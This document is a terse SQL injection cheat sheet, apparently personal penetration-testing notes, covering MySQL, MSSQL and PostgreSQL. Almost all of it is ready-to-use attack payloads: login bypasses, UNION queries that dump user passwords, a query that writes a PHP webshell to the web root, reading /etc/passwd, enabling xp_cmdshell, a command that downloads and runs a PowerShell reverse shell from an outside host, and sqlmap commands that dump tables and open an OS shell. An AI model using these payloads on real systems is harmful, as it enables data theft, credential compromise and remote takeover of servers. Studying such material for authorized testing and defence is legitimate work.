https://portswigger.net/web-security/sql-injection/cheat-sheet

#### Blind SQL ####
' OR 1=2 -- //
'%20OR%201%3d2%20--%20%2f%2f

####### CHECK #######
' or 1=1 -- //
' or 1=1#
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

####### UNION #######
' ORDER BY 1-- //
# Check number of columns to use with UNION
' UNION SELECT null, null, database(), user(), @@version  -- //
# Try it with 5 columns. TIP: the first column is usualy for ID number, so no strings allowed.
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
# Retrieve table, column and table_schema from info_schema.columns from the current DB
' UNION SELECT null, username, password, description, null FROM users -- //
# Retrieve username password and description from table 'users'

##############
####### MySQL
##############

Show tables:
' UNION select NULL,NULL,NULL,table_schema,table_name,NULL FROM information_Schema.tables;#

RCE:
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/webshell.php" -- //
$ Write webshell.php inside server
' UNION ALL SELECT NULL,NULL,NULL,NULL,"<?php system($_GET['cmd']);?>",NULL INTO OUTFILE "/var/www/html/webshell.php"#
$ Another way to do the same
GET webshell.php?cmd=whoami

Read Files:
' UNION ALL SELECT NULL,NULL,NULL,NULL,load_file("/etc/passwd"),NULL#

mysql -u dbadmin -p'dbpass' -h 10.0.0.1 -P 3306
select version();
select system_user();
show databases;
use 'database';
show tables;
SELECT * FROM table1;
SELECT user, authentication_string FROM mysql.user WHERE user = 'user01';

### Time Delay
SELECT SLEEP(10)

##############
####### MSSQL
##############

impacket-mssqlclient dbadmin:dbpass@10.0.0.1 -windows-auth
SELECT table_name FROM information_schema.tables
# List tables;
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM user01.information_schema.tables;
select * from user01.dbo.users;

### Enable XP-CMDShell
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
EXECUTE xp_cmdshell 'whoami';
RECONFIGURE;

sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Oneliner

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.243:80/rev.ps1") | powershell -noprofile'
# Run reverse shell

a'; EXEC xp_cmdshell 'powershell -e JABjAGwAaQBl...QAoACkA' --
# run base64 encoded payload on server

### Time Delay
WAITFOR DELAY '0:0:10'
a'; WAITFOR DELAY '0:0:4'-- 

####################
###### POSTGRE
####################

https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection
https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql

';SELECT PG_SLEEP(5)--
# Stack based injection

' AND 4050=(SELECT 4050 FROM PG_SLEEP(5))-- RJlz
# Blind injection

####################
### SQLMap ###
####################
-vvv #show payloads used

sqlmap -u http://10.0.0.1/ --random-agent --cookie='PHPSESSID=g1ds2c7...ikr3frffp8' --data='uid=teste&password=testepass' -p uid -D insidedb -T insidetable --dump
$ Using POST with session cookie and body data, -D set DataBase and T set Table

sqlmap -v -u http://$target/class.php --data 'weight=100&height=190&age=34&gender=Male&email=asdf%40asdf.com' --random-agent -p height --os-shell
$ Get exec on server
